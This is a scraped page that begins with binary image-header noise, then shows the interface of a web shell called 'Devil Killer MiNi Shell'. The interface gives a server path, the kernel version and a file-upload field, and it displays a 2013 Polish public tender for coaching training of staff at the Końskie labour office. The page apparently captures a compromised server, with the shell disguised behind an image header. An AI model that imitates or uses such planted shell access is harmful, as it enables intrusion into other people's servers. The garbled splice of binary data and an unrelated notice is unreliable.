JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20130301/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20130301/32149-N-2013.html

<p class="kh_header"><b>Końskie: Organizacja i przeprowadzenie szkolenia dla pracowników Powiatowego Urzędu Pracy w Końskich w ramach projektu Profesjonalna Kadra.</b><br>
<b>Numer ogłoszenia: 32149 - 2013; data zamieszczenia: 01.03.2013</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Powiat Konecki , ul. Staszica 2, 26-200 Końskie, woj. świętokrzyskie, tel. 0-41 372 41 34, faks 0-41 372 83 20.</p>
<ul class="kh_indent_1">
</ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Organizacja i przeprowadzenie szkolenia dla pracowników Powiatowego Urzędu Pracy w Końskich w ramach projektu Profesjonalna Kadra..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest zorganizowanie i przeprowadzenie szkolenia oraz jego techniczna organizacja dla 7 pracowników Powiatowego Urzędu Pracy w Końskich w ramach projektu Profesjonalna kadra  współfinansowanego środkami Unii Europejskiej w ramach Europejskiego Funduszu Społecznego.
Temat szkolenia : Coaching  - metoda skutecznej aktywizacji osób bezrobotnych - szkolenie otwarte.
Cel szkolenia : Nabycie umiejętności udzielania wsparcia dla osób bezrobotnych w formie coachingu oraz rozwijanie podstawowych umiejętności coacha, takich jak nawiązywania kontaktu z bezrobotnymi, precyzyjnego przekazywania treści, dopasowania stylu rozmowy do odbiorcy, kierowania rozmowy do wyznaczonego celu. Nabycie umiejętności stosowania metod i narzędzi coachingowych zwiększających efektywność procesu aktywizacji zawodowej.
Program szkolenia musi zawierać m.in. następujące zagadnienia :
1.Wprowadzanie do coachingu - definicje , modele rozmów coachingowych.
2.Różnice pomiędzy terapią, doradztwem personalnym/poradnictwem zawodowym  a coachingiem.
3.Warsztat i kompetencje coacha.
4.Podstawowe narzędzia komunikacyjne coacha. Model dobrego komunikowania się. Nastawienie na cele w komunikacji.
5.Rodzaje coachingu i możliwości ich zastosowania w pracy PUP
6.Metody i narzędzia coachingowe zwiększających efektywność procesu aktywizacji zawodowej.
7.Etapy coachingu
8.Podsumowanie szkolenia - Sesja warsztatowa ( zastosowanie ww. wiedzy  w praktyce).
Zgodnie z przepisami dotyczącymi kształcenia dorosłych w formach pozaszkolnych program nauczania każdej formy kształcenia powinien zawierać :
1.nazwę formy kształcenia;
2. czas trwania i sposób jej organizacji;
3.wymagania wstępne dla uczestników;
4. cele kształcenia;
5.plan nauczania określający nazwę zajęć edukacyjnych oraz ich wymiar;
6.treści kształcenia w zakresie poszczególnych zajęć edukacyjnych;
7.wykaz literatury oraz niezbędnych środków i materiałów dydaktycznych;
8.sposób sprawdzania efektów kształcenia.
Rezultaty : 
Po zakończonym szkoleniu jego uczestnicy nabędą wiedzę oraz umiejętności  w zakresie coachingu na rzecz skutecznego organizowania procesu aktywizacji zawodowej klientów.
Liczba uczestników szkolenia -7 osób.
Liczba godzin dydaktycznych -20  h.
Czas trwania szkolenia -	3  dni.
Termin realizacji szkolenia -kwiecień - czerwiec  2013 r.

Metody i techniki jakie wykonawca ma obowiązek zastosować podczas szkolenia :
- wykłady - podczas których nastąpi werbalna prezentacja tematu przez prowadzącego szkolenie przy wykorzystaniu rzutnika multimedialnego, ekranu, tablicy flip chart ;
- warsztaty - na których materiał poznany na wykładach zostanie lepiej przyswojony przez uczestników szkolenia, zaś opanowane techniki zostaną wdrożone  w przyszły system pracy z bezrobotnym;
- dyskusje, konsultacje - dzięki którym, zaistnieje możliwość  uszczegółowienia uzyskanych informacji.

Kwestie organizacyjne dotyczące poszczególnych zadań :
a) Wykonawca obowiązany jest  zapewnić:
- transport  uczestnikom szkolenia wraz z posiadanymi przez nich bagażami  z miejsca wyznaczonego przez Zamawiającego do miejsca szkolenia  i z powrotem, ewentualnie w cenę szkolenia Wykonawca musi wliczyć koszty dojazdu z/ na szkolenie ,
- zakwaterowanie wraz z noclegiem w hotelu o standardzie minimum trzy gwizdkowym na okres szkolenia,
- pełne wyżywienie dla uczestników każdego dnia szkolenia
b) Zajęcia muszą być prowadzone w salach szkoleniowych zlokalizowanych  w hotelach o standardzie minimum 3 - gwiazdkowym lub w ośrodkach konferencyjno - szkoleniowych  odpowiadających standardem hotelowi 3-gwiazdkowemu  - zgodnie z przepisami bezpieczeństwa i higieny pracy.
c) Sala do prowadzenia zajęć musi być klimatyzowana z odpowiednią wizualizacją  ( logo PO KL         i logotyp Unii Europejskiej / dwanaście złotych pięcioramiennych gwiazd na błękitnym tle                  z odwołaniem słownym do Unii Europejskiej i Europejskiego Funduszu Społecznego , Wykonawca musi ponadto zamieścić informację o realizowaniu projektu współfinansowanego ze środków Unii Europejskiej  w ramach Europejskiego Funduszu Społecznego), wyposażona w rzutnik do prezentacji multimedialnej, laptopa oraz tablicę  flip chart.
d) W przypadku braku możliwości dojazdu uczestników na miejsce szkolenia w dniu rozpoczęcia szkolenia Wykonawca zapewni nocleg zgodny z powyższym opisem oraz kolację w przeddzień szkolenia. Ostatni dzień szkolenia musi zakończyć się w godzinach umożliwiających powrót uczestników szkolenia do miejsca zamieszkania w dniu zakończenia szkolenia
e) Wykonawca zobowiązany jest zapewnić wyżywienie dla każdego uczestnika szkolenia podczas każdego dnia , w którym będą odbywać się zajęcia szkoleniowe. Wyżywienie musi obejmować :
-   2 śniadania w formie szweckiego stołu ( jeśli dojazd dzień wcześniej 3 śniadania)
- co najmniej 2 przerwy kawowe dziennie ( kawa , herbata, napoje niegazowane, soki owocowe - 2 rodzaje, woda, ciastka deserowe).
- 3 obiady składające się z minimum dwóch dań tj. zupy , dania głównego i deseru . Podczas obiadu należy zapewnić również herbatę, kawę, wodę i soki owocowe -       2 rodzaje,
- 2 kolacje w formie szweckiego stołu ( jeśli dojazd dzień wcześniej 3 kolacje).
Miejsce wydawania posiłków powinno znajdować się w tym samym obiekcie, w którym prowadzone są szkolenia przy czym niedopuszczalne jest, aby posiłki serwowano w ramach jednego pomieszczenia, w którym będzie odbywać się szkolenie.
f) Wykonawca jest bezpośrednio odpowiedzialny za przygotowanie , przeprowadzenie i obsługę szkolenia, zapewnienie materiałów dydaktycznych oraz pomocy szkoleniowych, zapewnienie trenerów szkoleń i osoby będącej koordynatorem szkolenia. Osoba wyznaczona w tym celu przez Wykonawcę musi przebywać ( przez cały okres trwania szkolenia) w miejscu odbywania zajęć w celu zapewnienia prawidłowej organizacji zajęć i powinna dysponować numerem telefonu kontaktowego.
g) Szkolenie ma odbyć się  w odległości dalszej niż 50 km od granicy administracyjnej miasta Końskie  jednak nie dalszej niż 300 km od granicy miasta Końskie.
h) Wykonawca winien zapewnić ubezpieczenie od następstw nieszczęśliwych wypadków NNW dla wszystkich uczestników szkoleń od pierwszego do ostatniego dnia szkolenia.
i) Wykonawca musi zapewnić dla każdego uczestnika szkolenia materiały szkoleniowe w formie skryptów (papierowych i na nośniku elektronicznym)dla opisanego zakresu szkolenia objętego umową oraz materiały biurowe: notatnik, długopis automatyczny, zakreślacz, teczkę A4 z rączką       z utwardzonego kartonu wraz  ze szczegółowym programem szkolenia  ( skrypty w formie papierowej          i elektronicznej oraz teczki A4 muszą być opatrzone logo PO KL i logotypem Unii Europejskiej/ dwanaście złotych pięcioramiennych gwiazd na błękitnym tle z odwołaniem słownym do Unii Europejskiej  i Europejskiego Funduszu Społecznego oraz informację o realizowaniu projektu współfinansowanego ze środków Unii Europejskiej  w ramach Europejskiego Funduszu Społecznego).
Materiały szkoleniowe oraz materiały biurowe każdy z uczestników szkolenia dostaje na własność.
j) Po zakończeniu szkolenia Wykonawca musi wydać uczestnikom szkoleń zaświadczenie potwierdzające udział w szkoleniu.

Zaświadczenie to musi być wydane zgodnie z Rozporządzeniem Ministra Pracy i Polityki Społecznej z dnia 14 września 2010 r. w sprawie standardów i warunków prowadzenia usług rynku pracy (Dz. U. z 2010r. Nr 177 poz.1193 z późniejszymi zmianami - rozporządzenie MPiPS z dnia 12 grudnia 2011 r. zmieniające rozporządzenie w sprawie standardów i warunków prowadzenia usług rynku pracy, lub na wzorze zgodnym z rozporządzeniem MEN z dnia 11 stycznia 2012 roku w sprawie kształcenia ustawicznego w formach pozaszkolnych.

k) Wykonawca zobowiązany jest udostępnić Zamawiającemu dokumenty związane z realizowanym Projektem, w tym dokumenty  finansowe , w terminie określonym przez  Zamawiającego.
l) Wykonawca jest zobowiązany umożliwić Zamawiającemu oraz Wojewódzkiemu Urzędowi Pracy w Kielcach - Instytucji Wdrażającej ( Instytucji Pośredniczącej II stopnia), dokonanie kontroli              w miejscach realizacji projektu.
m) Wykonawca ma obowiązek prowadzić podczas szkoleń listę obecności uczestników szkolenia.
n) Wykonawca ma obowiązek przeprowadzić wśród uczestników szkolenia, ankietę dotyczącą jakości szkolenia . 
o) Szkolenie ma być realizowane zgodnie z programem szkolenia. Zajęcia muszą odbywać się codziennie w dni powszednie. Nie mogą odbywać się w sobotę , niedzielę oraz w dni ustawowo wolne od pracy. Maksymalna dzienna liczba godzin szkolenia nie może przekroczyć 8 godzin zegarowych.
p) Szkolenie musi  być przeprowadzone przez odpowiednią kadrę szkoleniową.
q) Wykonawca ma obowiązek wszystkie dokumenty wymagane przez Zamawiającego oznaczyć logo PO KL i logotypem Unii Europejskiej / dwanaście złotych pięcioramiennych gwiazd na błękitnym tle  z odwołaniem słownym do Unii Europejskiej   i Europejskiego Funduszu Społecznego , ponadto Wykonawca musi  na żądanych dokumentach zamieścić informację o realizowaniu projektu współfinansowanego ze środków Unii Europejskiej  w ramach Europejskiego Funduszu Społecznego  i przekazać te dokumenty Zamawiającemu :
Projekt współfinansowany ze środków Unii Europejskiej w ramach Europejskiego Funduszu Społecznego Program Operacyjny  Kapitał Ludzki, Priorytet VI, Działanie 6.1, Poddziałanie 6.1.2 Wsparcie powiatowych i wojewódzkich urzędów pracy w realizacji zadań na rzecz aktywizacji zawodowej osób bezrobotnych w regionie.
- zaświadczenie o ukończeniu szkolenia, zaświadczenie to musi być wydane zgodnie z Rozporządzeniem Ministra Pracy i Polityki Społecznej z dnia 14 września 2010 r. w sprawie standardów i warunków prowadzenia usług rynku pracy (Dz. U. z 2010r. Nr 177 poz.1193 z późniejszymi zmianami - rozporządzenie MPiPS z dnia 12 grudnia 2011 r. zmieniające rozporządzenie w sprawie standardów i warunków prowadzenia usług rynku pracy, lub na wzorze zgodnym z rozporządzeniem MEN z dnia 11 stycznia 2012 roku w sprawie kształcenia ustawicznego w formach pozaszkolnych
- ankietę dotyczącą jakości szkolenia ;
- listę obecności uczestników szkolenia;
- dziennik zajęć zgodny z programem szkolenia;
- potwierdzenie otrzymania materiałów dydaktycznych;
- imienny wykaz osób, które ukończyły szkolenie;
- fakturę za wykonane szkolenie.

Zamawiający dokona zapłaty za w/w szkolenie po jego zakończeniu oraz przedłożeniu dokumentów wymienionych w umowie po podpisaniu przez strony zgodnego protokołu odbioru usługi..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 80.51.10.00-9.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 30.06.2013.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający nie przewiduje wnoszenia wadium.</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca potwierdza spełnianie warunku poprzez złożenie oświadczenia  o spełnianiu warunków udziału w postępowaniu określonych w art. 22 ust.1</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>W celu wykazania spełniania przez Wykonawcę  warunku posiadania wiedzy                           i doświadczenia , Zamawiający żąda :

- wykazu wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych , co najmniej 2 ( dwóch ) głównych usług t. j. usług szkoleniowych, w okresie ostatnich trzech lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których usługi zostały wykonane oraz załączeniem dowodów, czy zostały wykonane lub są wykonywane należycie .

Dowodami, o których mowa, są:
- poświadczenie, z tym że w odniesieniu do nadal wykonywanych usług okresowych lub ciągłych poświadczenie powinno być wydane nie wcześniej niż na 3 miesiące przed upływem terminu składania ofert;
- oświadczenie wykonawcy - jeżeli z uzasadnionych przyczyn o obiektywnym charakterze wykonawca nie jest w stanie uzyskać poświadczenia, o którym mowa powyżej.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>W celu wykazania spełniania przez Wykonawcę warunku dysponowania osobami zdolnymi do wykonania zamówienia, Zamawiający żąda :

- wykazu osób , które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług - 1 osoba.

Trenerem musi być osoba, która spełnia poniższe wymagania w zakresie wykształcenia                               i doświadczenia :
- posiadająca wykształcenie wyższe ;
- posiadająca  minimum 3-letnie doświadczenie jako trener  w prowadzeniu szkoleń dla pracowników Publicznych Służb Zatrudnienia ;
- przeprowadziła minimum 3 szkolenia w zakresie odpowiadającym przedmiotowi zamówienia t. j. usługi szkoleniowe o tej samej lub podobnej tematyce dla pracowników Publicznych Służb Zatrudnienia.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>- Wykonawca potwierdza spełnianie warunku poprzez złożenie oświadczenia  o spełnianiu warunków udziału w postępowaniu określonych w art. 22 ust.1</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
</li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>W zakresie wykazania spełniania przez Wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy Pzp
a)  podpisane przez wykonawcę lub upoważnionego pełnomocnika oświadczenie o spełnianiu warunków udziału w postępowaniu określonych w art. 22 ust.1 ( załącznik nr 2 do SIWZ ).

b) wykaz wykonanych , a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, głównych usług w okresie ostatnich 3 (trzech) lat przed upływem terminu składania ofert , a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dowodów, czy zostały wykonane lub są wykonywane należycie ( załącznik nr 5 do SIWZ ).

c)wykaz osób , które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacja o podstawie do dysponowania tymi osobami ( załącznik nr 6 do SIWZ ).

Wykonawca do oferty dołącza dokument lub dokumenty, z których będzie wynikać uprawnienie do podpisania  oferty, np. aktualny odpis z właściwego rejestru, aktualne zaświadczenie o wpisie do ewidencji działalności gospodarczej, aktualny statut spółki lub aktualny rejestr handlowy. Wymagane dokumenty można złożyć w formie kopii poświadczonej za zgodność z oryginałem przez wykonawcę.  Treść pełnomocnictwa musi jednoznacznie określać czynności, co do wykonywania których pełnomocnik jest upoważniony.
W przypadku złożenia  odpisu z właściwego rejestru lub zaświadczenia o wpisie do ewidencji działalności gospodarczej - dokument taki musi być wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert.

Zaakceptowany projekt umowy ( załącznik nr 7 do SIWZ).

Wypełniony Formularz ofertowy ( załącznik nr 1 do SIWZ ) do którego należy dołączyć  wzór zaświadczenia potwierdzającego ukończenie szkolenia oraz  wzór ankiety oceniającej szkolenie.

Program szkolenia i harmonogram ( załącznik nr 8 do SIWZ) .

Pisemne zobowiązanie podmiotów biorących udział w wykonaniu zamówienia ( zgodnie z art. 26 ust. 2b ustawy Prawo zamówień publicznych, jeśli dotyczy)- ( załącznik  nr 9 do SIWZ ).

Listę podmiotów należących do tej samej grupy kapitałowej, o której mowa w art. 24 ust. 2 pkt. 5, albo informację o tym, że wykonawca nie należy do grupy kapitałowej (załącznik nr 4 do SIWZ).
W celu wykazania spełnienia warunku udziału w postępowaniu dotyczącego braku podstaw do wykluczenia z postępowania o udzielenie zamówienia Wykonawcy w okolicznościach, o których mowa w art. 24 ust.1 ustawy Pzp należy zalączyć aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust.1 pkt.2 ustawy Pzp, wystawionego nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert.
Jeżeli w kraju miejsca zamieszkania osoby lub w kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, nie wydaję się dokumentów, o których mowa w ust. 1, zastępuje się je dokumentem zawierającym oświadczenie, w którym określa się także osoby uprawnione do reprezentacji wykonawcy, złożone przed właściwym organem sadowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego odpowiednio kraju miejsca zamieszkania osoby lub kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, lub przed notariuszem.</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz dodatkowe kryteria i ich znaczenie:</p><ul class="kh_indent_1">
<li>1 - Cena - 80</li>
<li>2 - Doświadczenie wykonawcy w realizacji usług zgodnych z przedmiotem zamówienia - 20</li>
</ul>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>1.  Zamawiający dopuszcza zmianę postanowień zawartej umowy w stosunku do treści oferty na podstawie której dokonano wyboru w następujący sposób :
a) w uzasadnionych przypadkach dopuszcza się zmianę kadry prowadzącej szkolenie, pod warunkiem, że proponowana kadra będzie spełniała warunki opisane w niniejszej specyfikacji. Informacja o zmianie musi wpłynąć do zamawiającego na piśmie na co najmniej 1 dzień przed zaistniałą okolicznością.
b) w uzasadnionych przypadkach dopuszcza się zmianę miejsca prowadzenia szkolenia. Informacja o zmianie musi wpłynąć do zamawiającego na piśmie co najmniej 5 dni roboczych przed rozpoczęciem szkolenia.
2. Wprowadzone zmiany muszą odpowiadać opisowi przedmiotu zamówienia ujętego w SIWZ.
3. Zamawiający musi wyrazić zgodę na wprowadzenie zmian o których mowa w ust. 1.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.pup.konskie.ibip.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Powiatowy Urząd Pracy w Końskich
ul. Stanisława Staszica 2
26 - 200 Końskie
pok. nr 13 (I piętro).</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 11.03.2013 godzina 10:30, miejsce: Powiatowy Urząd Pracy w Końskich
ul. Stanisława Staszica 2
26 - 200 Końskie
pok. nr 18 (I piętro).</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Projekt współfinansowany ze środków Unii Europejskiej w ramach Europejskiego Funduszu Społecznego Program Operacyjny  Kapitał Ludzki, Priorytet VI, Działanie 6.1, Poddziałanie 6.1.2 Wsparcie powiatowych i wojewódzkich urzędów pracy w realizacji zadań na rzecz aktywizacji zawodowej osób bezrobotnych w regionie..</p>
